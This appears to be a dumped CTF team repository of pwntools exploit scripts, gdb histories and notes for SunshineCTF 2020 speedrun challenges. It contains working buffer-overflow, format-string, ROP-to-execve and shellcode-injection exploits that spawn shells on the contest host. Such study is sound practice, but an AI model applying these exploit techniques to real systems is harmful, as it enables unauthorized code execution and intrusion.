22 | fflush2 = fflush1 + 2
23 | 
24 | payload = b'AAAA' + p32(fflush2) + p32(fflush1)
25 | n_sent = len(payload)
26 | 
27 | payload += "%{}x".format(win2 - n_sent).encode() + b'%7$hn'
28 | n_sent = win2
29 | 
30 | payload += "%{}x".format(win1 - n_sent).encode() + b'%8$hn'
31 | 
32 | print(payload)
33 | 
34 | with open('payload', 'w') as f:
35 |     f.write(p1 + '\n')
36 | 
37 | with open('payload', 'ab') as f:
38 |     f.write(payload)
39 | 
40 | sh.sendline(p1)
41 | 
42 | sh.sendline(payload)
43 | sh.interactive()
44 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/12/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/12/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | main
 3 | ni
 4 | ni
 5 | ni
 6 | ni
 7 | si
 8 | disassemble vuln
 9 | ni
10 | ni
11 | ni
12 | p $ebx
13 | telescope $ebx
14 | distance $esp $ebp
15 | ni
16 | ni
17 | p win
18 | p vuln
19 | disassemble systemFunc 
20 | checksec
21 | ls
22 | q
23 | b vuln
24 | run
25 | ni
26 | cyclic 256
27 | ni
28 | info frame
29 | q
30 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/chall_13:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/13/chall_13


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/13/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | sh = remote('chal.2020.sunshinectf.org', 30013)
 4 | # sh = process('./chall_13')
 5 | 
 6 | p1 = 'abc'
 7 | 
 8 | # ► 0x8048528 <vuln+39>    ret    <0x61716161>
 9 | padding = cyclic_find(0x61716161)
10 | print('padding:', padding)
11 | 
12 | ret_addr = 0x080484d6
13 | payload = cyclic(padding) + p32(ret_addr)
14 | 
15 | with open('payload', 'w') as f:
16 |     f.write(p1 + '\n')
17 | 
18 | with open('payload', 'ab') as f:
19 |     f.write(payload)
20 | 
21 | sh.recvline()
22 | sh.sendline(p1)
23 | 
24 | sh.sendline(payload)
25 | sh.interactive()
26 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/notes.md:
--------------------------------------------------------------------------------
 1 |  ► 0x8048528 <vuln+39>    ret    <0x61716161>
 2 | 
 3 |  Dump of assembler code for function systemFunc:
 4 |     0x080484d6 <+0>:	push   ebp
 5 |     0x080484d7 <+1>:	mov    ebp,esp
 6 |     0x080484d9 <+3>:	push   ebx
 7 |     0x080484da <+4>:	sub    esp,0x4
 8 |     0x080484dd <+7>:	call   0x8048582 <__x86.get_pc_thunk.ax>
 9 |     0x080484e2 <+12>:	add    eax,0x1b1e
10 |     0x080484e7 <+17>:	sub    esp,0xc
11 |     0x080484ea <+20>:	lea    edx,[eax-0x19f0]
12 |     0x080484f0 <+26>:	push   edx
13 |     0x080484f1 <+27>:	mov    ebx,eax
14 |     0x080484f3 <+29>:	call   0x8048390 <system@plt>
15 |     0x080484f8 <+34>:	add    esp,0x10
16 |     0x080484fb <+37>:	nop
17 |     0x080484fc <+38>:	mov    ebx,DWORD PTR [ebp-0x4]
18 |     0x080484ff <+41>:	leave  
19 |     0x08048500 <+42>:	ret    
20 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/13/payload:
--------------------------------------------------------------------------------
1 | abc
2 | aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaք


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/README.md:
--------------------------------------------------------------------------------
1 | https://quentinmeffre.fr/pwn/2017/01/25/easy_method.html
2 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/chall_14:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/chall_14


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30014)
 6 | # sh = process('./chall_14')
 7 | 
 8 | p1 = 'abc'
 9 | 
10 | padding = cyclic_find(0x62616162)
11 | print('padding:', padding)
12 | 
13 | data = 0x06b90e0
14 | p = cyclic(padding)
15 | p += p64(0x0410263)  # pop rsi; ret;
16 | p += p64(data)  # address of data section
17 | p += p64(0x04158f4)  # pop rax; ret;
18 | p += b'/bin//sh'
19 | p += p64(0x047f401)  # mov qword ptr [rsi], rax; ret;
20 | p += p64(0x0400696)  # pop rdi; ret;
21 | p += p64(data)  # address of data section
22 | p += p64(0x044c0a9)  # pop rdx; pop rsi; ret;
23 | p += p64(0)  # set rdx to 0
24 | p += p64(0)  # set rsi to 0
25 | p += p64(0x04158f4)  # pop rax; ret;
26 | p += p64(59)  # set rax to 59
27 | p += p64(0x0474e35)  # syscall; ret;
28 | 
29 | with open('payload', 'w') as f:
30 |     f.write(p1 + "\n")
31 | 
32 | with open('payload', 'ab') as f:
33 |     f.write(p)
34 | 
35 | # Doesn't print line on remote for some reason
36 | # sh.recvline()
37 | sh.sendline(p1)
38 | 
39 | sh.sendline(p)
40 | sh.interactive()
41 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/main_srop.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = process('./chall_14')
 6 | 
 7 | p1 = 'abc'
 8 | 
 9 | padding = cyclic_find(0x62616162)
10 | print('padding:', padding)
11 | 
12 | binary = ELF('chall_14')
13 | rop = ROP(binary)
14 | binsh = 0x7fffffffd3c0
15 | rop.execve(binsh, 0, 0)
16 | print(rop.dump())
17 | 
18 | payload = b'/bin/sh\0'.ljust(padding, b'B')
19 | payload += rop.chain()
20 | payload = encoder.line(payload)
21 | 
22 | with open('payload', 'w') as f:
23 |     f.write(p1 + "\n")
24 | 
25 | with open('payload', 'ab') as f:
26 |     f.write(payload)
27 | 
28 | sh.recvline()
29 | sh.sendline(p1)
30 | 
31 | sh.sendline(payload)
32 | sh.interactive()
33 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/notes.md:
--------------------------------------------------------------------------------
 1 | pwndbg> p &__stack_prot
 2 | $2 = (<data variable, no debug info> *) 0x6b8ef0 <__stack_prot>
 3 | 
 4 | Gadgets
 5 | 
 6 | 0x0000000000410263: pop rsi; ret;
 7 | 0x00000000004158f4: pop rax; ret;
 8 | 0x000000000047f401: mov qword ptr [rsi], rax; ret;
 9 | 0x0000000000400696: pop rdi; ret;
10 | 0x000000000044c0a9: pop rdx; pop rsi; ret;
11 | 
12 | pwndbg> p &__data_start 
13 | $1 = (<data variable, no debug info> *) 0x6b90e0
14 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/scrap.py:
--------------------------------------------------------------------------------
1 | # Payload:
2 | # padding
3 | # set __stack_prot to 7
4 | # set RDI to __libc_stack_end
5 | # execute _dl_make_stack_executable
6 | # push shellcode
7 | 
8 | stack_prot = 0x6b8ef0
9 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/chall_15:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/chall_15


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/flag.txt:
--------------------------------------------------------------------------------
1 | sun{fart}
2 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30015)
 6 | # sh = process('./chall_15')
 7 | 
 8 | sh.sendline('abc')
 9 | s = sh.recvline().decode('ascii').split()
10 | buf = int(s[-1], 0)  # 0x7fffffffd3da
11 | print('buf:', hex(buf))
12 | 
13 | # p[10] == 0xfacade or p[66] == 0xfacade
14 | # 0x5555555547c9: pass exit
15 | # ► 0x5555555547cb <vuln+177>    ret    <0x6176616161756161>
16 | ret_addr_padding = 78
17 | 
18 | p = asm(shellcraft.cat('flag.txt')).ljust(66, asm('nop'))
19 | p += p32(0xfacade)
20 | p = p.ljust(ret_addr_padding, b'Z')
21 | p += p64(buf)
22 | 
23 | # p = ((b'A' * 10) + p32(0xfacade)).ljust(16, b'Z')
24 | # shcode_offset = len(p)
25 | # print(len(p))
26 | # p = p.ljust(ret_addr_padding, b'B')
27 | # p += p64(buf + shcode_offset)
28 | # p = encoder.line(p)
29 | 
30 | # with open('payload', 'w') as f:
31 | #     f.write('abc\n')
32 | 
33 | with open('payload', 'wb') as f:
34 |     f.write(p)
35 | 
36 | sh.sendline(p)
37 | print(sh.recvallS(timeout=2))
38 | 
39 | # 0x7ffe93518470
40 | # 0x7ffe93518478
41 | # 0x7ffe93518434
42 | # 0x7ffcf95e812a
43 | # 0x7fff99c4a45a
44 | # 0x7fff99c4a46a
45 | # 0x7ffe3820f17a
46 | # 0x7ffe3820f18a
47 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/notes.md:
--------------------------------------------------------------------------------
 1 | pwndbg> x/x $rbp-0x3c
 2 | 0x7fffffffd3e4:	0x61646161
 3 | pwndbg> x/x $rbp-4
 4 | 0x7fffffffd41c:	0x61726161
 5 | 
 6 | pwndbg> x/x $rbp-0x3c
 7 | 0x7fffffffd3e4:	0x61646161 <- 10
 8 | pwndbg> x/x $rbp-4
 9 | 0x7fffffffd41c:	0x61726161 <- 66
10 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/.gdb_history:
--------------------------------------------------------------------------------
  1 | start
  2 | main
  3 | ni
  4 | ni
  5 | ni
  6 | ni
  7 | p $rax
  8 | ni
  9 | ni
 10 | p $rax
 11 | ni
 12 | p $rax
 13 | q
 14 | b main
 15 | p win
 16 | run < payload
 17 | ni
 18 | q
 19 | b main
 20 | run < payload
 21 | ni
 22 | q
 23 | b main
 24 | run < payload
 25 | ni
 26 | p $Rax
 27 | p $rax
 28 | ni
 29 | p $rax
 30 | ni
 31 | ni
 32 | ni
 33 | ni
 34 | ni
 35 | p $eax
 36 | stack
 37 | distance r8 rbp
 38 | ni
 39 | ni
 40 | p $rbx
 41 | ni
 42 | hex # 0x555555755020
 43 | hex 0x555555755020
 44 | ni
 45 | ni
 46 | ni
 47 | p $eax
 48 | ni
 49 | ni
 50 | p $eax
 51 | ni
 52 | p $eax
 53 | ni
 54 | ni
 55 | ni
 56 | p $eax
 57 | x $rbp-0x54
 58 | disassemble main
 59 | ni
 60 | ni
 61 | run < payload
 62 | checksec
 63 | run < payload
 64 | ni
 65 | ni
 66 | ni
 67 | ni
 68 | ni
 69 | run < payload
 70 | ni
 71 | ni
 72 | p $rbx
 73 | p $Rax
 74 | p $rax
 75 | ni
 76 | ni
 77 | ni
 78 | ni
 79 | p $eax
 80 | ni
 81 | p $rbx
 82 | ni
 83 | ni
 84 | ni
 85 | ni
 86 | ni
 87 | ni
 88 | ni
 89 | p $eax
 90 | ni
 91 | p $al
 92 | p $eax
 93 | p $rb-0x54
 94 | x $rbp-0x54
 95 | ni
 96 | p $eax
 97 | nids key
 98 | ds key
 99 | ds 0x555555755020
100 | q
101 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/chall_16:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/16/chall_16


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30016)
 6 | # sh = process('./chall_16')
 7 | 
 8 | def fuck(x):
 9 |     x = ord(x)
10 |     for i in range(0x30, 0x94):
11 |         x = x ^ i
12 |     return chr(x)
13 | 
14 | key = 'Queue epic guitar solo *syn starts shredding*\n'
15 | payload = [fuck(k) for k in key]
16 | payload = "".join(payload)
17 | print(payload)
18 | 
19 | sh.sendline(payload)
20 | sh.interactive()
21 | 
22 | # payload = 'A' * 45
23 | 
24 | # with open('payload', 'w') as f:
25 | #     f.write(payload + "\n")
26 | 
27 | # 0x555555755020
28 | 
29 | # sh.sendline(payload)
30 | # sh.interactive()
31 | 
32 | # ► 0x400b9c <main+63>    ret    <0x6261616362616162>
33 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/payload:
--------------------------------------------------------------------------------
1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | main
 3 | ni
 4 | ni
 5 | p $eax
 6 | ni
 7 | ni
 8 | ni
 9 | ni
10 | ni
11 | hex $esp
12 | hex $rsp
13 | telescope $rbp-0x10
14 | x/i $rsp
15 | x/w $rsp
16 | ctx
17 | ni
18 | p $eax
19 | ni
20 | p $rbp-0xc
21 | p $rsp
22 | x $rbp0xc
23 | x/w $rbp-0xc
24 | x/w $rbp
25 | x/w $rbp-0x10
26 | x/w $rbp-0
27 | x/w $rbp-0xc
28 | checksec
29 | run
30 | b main
31 | run
32 | ni
33 | ni
34 | ni
35 | ni
36 | ni
37 | x/w $rsp
38 | ni
39 | q
40 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/17/a.out


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/chall_17:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/17/chall_17


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import subprocess
 3 | 
 4 | sh = remote('chal.2020.sunshinectf.org', 30017)
 5 | # sh = process('./chall_17')
 6 | 
 7 | sub_ans = subprocess.check_output('./a.out')
 8 | p = sub_ans.decode().strip()
 9 | print(p)
10 | 
11 | sh.sendline(p)
12 | print(sh.recvall())
13 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/test.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <time.h>
 4 | 
 5 | int main(int argc, char *argv[])
 6 | {
 7 |     time_t t = time(0);
 8 |     srand(t);
 9 |     printf("%d\n", rand());
10 |     return 0;
11 | }
12 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/a.out


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/chall_02:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/chall_02


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/main.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | 
 3 | pwn.context.arch = 'amd64'
 4 | 
 5 | sh = pwn.remote('chal.2020.sunshinectf.org', 30002)
 6 | # sh = pwn.process('./chall_02')
 7 | 
 8 | p1 = "A" * 13
 9 | 
10 | padding = 62
11 | payload = pwn.cyclic(padding) + pwn.p32(0x08048390) + pwn.p32(0x0) + pwn.p32(0x8049610)
12 | 
13 | with open('payload', 'w') as f:
14 |     f.write(p1 + '\n')
15 | 
16 | with open('payload', 'ab') as f:
17 |     f.write(payload)
18 | 
19 | sh.sendline(p1)
20 | sh.sendline(payload)
21 | sh.interactive()
22 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/notes.md:
--------------------------------------------------------------------------------
 1 | *EAX  0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f10 (_DYNAMIC) ◂— 0x1
 2 | 
 3 | ► 0x804851b <vuln+26>    call   gets@plt <gets@plt>
 4 |        arg[0]: 0xffffc5fe ◂— 0x35390000
 5 |        arg[1]: 0xffffc64c ◂— '1234567890123\n'
 6 |        arg[2]: 0x12
 7 |        arg[3]: 0x804850d (vuln+12) ◂— add    eax, 0x1af3
 8 | 
 9 | system addr: 0x08048390
10 | 
11 | ret addr offset: 62
12 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/test.c:
--------------------------------------------------------------------------------
1 | #include <stdlib.h>
2 | int main() {
3 |     system("/bin/sh");
4 |     return 0;
5 | }
6 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/.gdb_history:
--------------------------------------------------------------------------------
 1 | core core
 2 | q
 3 | b vuln
 4 | run
 5 | ni
 6 | distance $rbp $rsp
 7 | ni
 8 | ni
 9 | ni
10 | ni
11 | info frame
12 | cyclic -l 0x6261616167
13 | cyclic -l 0x62616167
14 | ni
15 | ni
16 | q
17 | core core
18 | q
19 | core core
20 | nearpc 0x7ffc474e17e0
21 | nearpc 0x7ffc474e17e0+100
22 | nearpc 0x7ffc474e17e0+120
23 | nearpc 0x7ffc474e17e0+80
24 | nearpc 0x7ffc474e17e0+20
25 | nearpc 0x7ffc474e17e0+40
26 | 
27 | nearpc 0x7ffc474e17e0 80
28 | nearpc 0x7ffc474e17e0 140
29 | bt
30 | ctx
31 | nearpc 0x7ffc474e17e0 180
32 | q
33 | start
34 | main
35 | ni
36 | 1234567890123
37 | ni
38 | s
39 | ni
40 | stack
41 | ni
42 | ni
43 | ni
44 | ni
45 | search /bin/sh
46 | ni
47 | ni
48 | info frame
49 | cyclic -l 0x62626267
50 | cyclic -l 0x62616167
51 | ctx
52 | checksec
53 | q
54 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/chall_03:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/chall_03


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30003)
 6 | # sh = process('./chall_03')
 7 | 
 8 | p1 = "A" * 13
 9 | 
10 | sh.recvline()
11 | sh.sendline(p1)
12 | 
13 | s = sh.recvline().decode('ascii').split()
14 | rsp_str = s[-1]
15 | rsp = int(rsp_str, 0)
16 | print(hex(rsp))
17 | 
18 | ret_addr_padding = 120
19 | payload = asm(shellcraft.sh()).ljust(ret_addr_padding, asm('nop'))
20 | print(len(payload))
21 | payload += p64(rsp)
22 | 
23 | # with open('payload', 'w') as f:
24 | #     f.write(p1 + '\n')
25 | 
26 | # with open('payload', 'ab') as f:
27 | #     f.write(payload)
28 | 
29 | sh.sendline(payload)
30 | sh.interactive()
31 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/chall_04:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/chall_04


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | binary = ELF('chall_04')
 6 | 
 7 | sh = remote('chal.2020.sunshinectf.org', 30004)
 8 | # sh = process('./chall_04')
 9 | 
10 | win_addr = 0x4005b7
11 | 
12 | payload = cyclic(56) + p64(win_addr)
13 | 
14 | p1 = "A" * 13
15 | 
16 | with open('payload', 'w') as f:
17 |     f.write(p1 + '\n')
18 | 
19 | with open('payload', 'ab') as f:
20 |     f.write(payload)
21 | 
22 | sh.recvline()
23 | sh.sendline(p1)
24 | 
25 | sh.sendline(payload)
26 | sh.interactive()
27 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/notes.md:
--------------------------------------------------------------------------------
 1 | Value of rdx
 2 | pwndbg> p $rbp-8
 3 | $2 = (void *) 0x7fffffffd418
 4 | 
 5 | We can control the value of `rdx`, so we can call any function.
 6 | But how do we specify the parameters? Can we use a ROP chain?
 7 | 
 8 | pwndbg> p system
 9 | $3 = {int (const char *)} 0x7ffff7e36f20 <__libc_system>
10 | 
11 | pwndbg> print system
12 | $1 = {<text variable, no debug info>} 0x4004b0 <system@plt>
13 | 
14 | pwndbg> search /bin/sh
15 | chall_04        0x4006b8 0x68732f6e69622f /* '/bin/sh' */
16 | chall_04        0x6006b8 0x68732f6e69622f /* '/bin/sh' */
17 | libc-2.31.so    0x7ffff7f78156 0x68732f6e69622f /* '/bin/sh' */
18 | 
19 | 0x4005dc <vuln+18>    lea    rax, [rbp - 0x40]
20 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/payload


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/.gdb_history:
--------------------------------------------------------------------------------
 1 | q
 2 | start
 3 | main
 4 | ni
 5 | ni
 6 | si
 7 | ni
 8 | distance main win
 9 | distance &main &win
10 | ni
11 | cyclic 100
12 | cyclic 100
13 | ni
14 | ni
15 | cyclic -l 0x6161616f
16 | q
17 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/chall_05:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/5/chall_05


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/5/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30005)
 6 | # sh = process('./chall_05')
 7 | 
 8 | p1 = "A" * 13
 9 | sh.recvline()
10 | sh.sendline(p1)
11 | 
12 | s = sh.recvline().decode('ascii').split()
13 | main_addr = int(s[-1], 0)
14 | print('main: ', hex(main_addr))
15 | win_addr = main_addr - 0x13
16 | print('win: ', hex(win_addr))
17 | 
18 | # ► 0x5555555547ea <vuln+68>            call   rdx <0x616161706161616f>
19 | padding = cyclic_find(0x6161616f)
20 | payload = cyclic(padding) + p64(win_addr)
21 | print(len(payload))
22 | 
23 | # with open('payload', 'w') as f:
24 | #     f.write(p1 + '\n')
25 | 
26 | # with open('payload', 'ab') as f:
27 | #     f.write(payload)
28 | 
29 | sh.sendline(payload)
30 | sh.interactive()
31 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/.gdb_history:
--------------------------------------------------------------------------------
 1 | start
 2 | p system
 3 | main
 4 | nini
 5 | ni
 6 | checksec
 7 | find /bin/sh
 8 | search /bin/sh
 9 | r2
10 | ctx
11 | ni
12 | ni
13 | ni
14 | ni
15 | cyclic 199
16 | ni
17 | ni
18 | si
19 | distance $rsp $rbp
20 | ni
21 | ni
22 | ni
23 | ni
24 | checksec
25 | ni
26 | ni
27 | ni
28 | ni
29 | ni
30 | p $rdx
31 | reg $rdx
32 | reg rdx
33 | x $rbp-8
34 | hexdump $rb-8
35 | hexdump $rbp-87
36 | hexdump $rbp-8
37 | checksec
38 | ni
39 | ni
40 | ni
41 | checksec
42 | disassemble vuln
43 | disassemble main
44 | run
45 | start
46 | main
47 | ni
48 | ni
49 | ni
50 | ni
51 | ni
52 | si
53 | ni
54 | cyclic 0x64
55 | cyclic 100
56 | ni
57 | ni
58 | ni
59 | q
60 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/chall_06:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/6/chall_06


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/6/core


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/main.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.arch = 'amd64'
 4 | 
 5 | sh = remote('chal.2020.sunshinectf.org', 30006)
 6 | # sh = process('./chall_06')
 7 | 
 8 | s = sh.recvline().decode('ascii').split()
 9 | rsp = int(s[-1], 0)
10 | print('rsp:', hex(rsp))
11 | 
12 | # sh_code = asm(shellcraft.sh()).rjust(64, asm('nop'))
13 | sh_code = asm(shellcraft.sh())
14 | sh.sendline(sh_code)
15 | 
16 | # ► 0x5555555547a0 <vuln+56>    call   rdx <0x616161706161616f>
17 | padding = cyclic_find(0x6161616f)
18 | print(padding)
19 | payload = cyclic(padding) + p64(rsp)
20 | print(len(payload))
21 | 
22 | sh.sendline(payload)
23 | sh.interactive()
24 | 


--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/notes.md:
--------------------------------------------------------------------------------
 1 | ► 0x555555554756 <main+60>    call   fgets@plt <fgets@plt>
 2 |        s: 0x7fffffffd380 ◂— 0x0
 3 |        n: 0xc7
 4 |        stream: 0x7ffff7fac980 (_IO_2_1_stdin_) ◂— 0xfbad2088
 5 | 
 6 | n = 199
 7 | 
 8 | pwndbg> reg rdx
 9 | *RDX  0x555555554610 (_start) ◂— xor    ebp, ebp
10 | 
11 | pwndbg> disassemble vuln
12 | Dump of assembler code for function vuln:
13 |    0x0000555555554768 <+0>:	push   rbp
